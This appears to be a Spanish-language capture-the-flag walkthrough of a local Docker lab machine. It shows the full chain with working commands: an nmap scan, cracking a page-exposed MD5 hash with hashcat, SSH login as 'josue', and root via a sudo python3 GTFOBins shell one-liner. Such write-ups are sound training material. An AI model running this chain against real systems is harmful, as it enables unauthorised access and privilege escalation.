Criptography

La criptografía es un laberinto donde la claridad se disfraza de sombra. No es el arte de ocultar lo que no puede verse, sino de hacer invisible aquello que todos miran.

Setup

Iniciamos con la maquina desplegandola localmente en docker, con nuestro auto_deploy.sh y pasándole como parámetro el .tar

./auto_deploy.sh criptography.tar

Una vez corriendo en nuestro host, procedemos a comenzar con la fase de reconocimiento.

Reconocimiento

Para esta fase iremos reconociendo de uno a uno en el rango de 0-65535 todos los puertos que esten abiertos dentro de la maquina víctima. Haciéndolo con el comando nmap.

nmap -p- -sS -sCV --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oN targeted

Obteniendo como resultado de OPEN el puerto 22, 80

# Nmap 7.95 scan initiated Sun Nov  2 14:40:56 2025 as: /usr/lib/nmap/nmap -p- -sS -sCV --min-rate 5000 -vvv -n -Pn -oN targeted 172.17.0.2
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.000011s latency).
Scanned at 2025-11-02 14:40:56 EST for 12s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 de:7c:45:ae:34:9f:ff:63:26:9e:12:ac:4c:6d:16:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMI/iR/x3EXdEpEfWeDBvdO8A2vhpKR8hdBf9bf27MaUcJ3gKQcWjUB+apsOMTj0GiErWB/q2W18mI2J6/0ivbM=
|   256 d1:dd:ff:74:d3:43:12:a5:1f:30:45:1d:c0:ad:9f:75 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOEGNlwHuV1nMhQ1ZajYBjHfhyNMb8s9mBvKnhv8qiTf
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Josue Palmo Home
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 3A:28:CB:57:A0:A5 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Puerto 80 (HTTP)

En el puerto 80 podemos ver corriendo una web un tanto, tema portafolio donde nos habla del sujeto Josue (posible potencial usuario), y nos comenta un poco más de él, eso es en toda la lading page.

Sin embargo al momento de darle una pequeña inspección, nos topamos con un mensaje algo particular.

Criptografia

Un mensaje pequeño pero con mucho potencial de ataque, para la ocasión, solo procedemos a descifrar la contraseña que previamente nos indica el sujero, muy amablemente, que previamente esta codificada en MD5.

# Previamente confirmamos que el hash sea MD5 con hashcat
hashcat 'd527d5cc7da2f2f5d0d6e9e4f5e02cd1'

Para posteriormente proceder con el escaneo de la contraseña.

hashcat 'd527d5cc7da2f2f5d0d6e9e4f5e02cd1' -m 0 -a 0 /usr/share/rockyou.txt

Dándonos un resultado particular:

d527d5cc7da2f2f5d0d6e9e4f5e02cd1:marihuana

Puerto 22 (SSH)

Como primera la credencial ya la tenemos, y como usuario podemos usar el de josue previamente encontrado para realizar una conexión a ssh que previamente vimos que estaba abierto.

Luego de ello nos lanzamos una bash para estas mas comodos y ahora en ~ nos encontramos una pequeña nota dejada para josue.

Un poco tocando el tema Valorant, y obtenemos otra credencial (la cual para esta ocasión no nos servirá de mucho), ahora pasándola a CrackStation podemos de igual forma descifrarla.

Dándonos otra credencial como la de josueelmejor.

Subir privilegios

Ahora que estamos conectados por ssh con el usuario josue, entre muchas cosas podemos ver que binarios puede ejecutar nuestro usuario de forma sudo.

$ sudo -l

User josue may run the following commands on ac8859911136:
	(ALL) NOPASSWD: /usr/bin/python3

Y como podemos visualizar, podemos ejecutar el binario de python3, un binario potencial sobretodo si podemos ejecutar como sudo, asi que vamos con la escalada.

GTFOBins

Una vez en GTFOBins, podemos realizar una búsqueda para python y entre muchas cosas.

Nos interesa especialmente que tenga este apartado en especial, ya que si tiene esta etiqueta significa que podemos proveernos de comandos para ejecutar en sudo y asi tener una escalada a root.

Y entre tantas variantes, esta es la que nos interesa, Sudo Python. Luego de modificarla un poco para que la ejecución sea efectiva, corremos el siguiente comando:

sudo python3 -c 'import os; os.system("/bin/bash")'

Para asi obtener haber escalado eficazmente a root.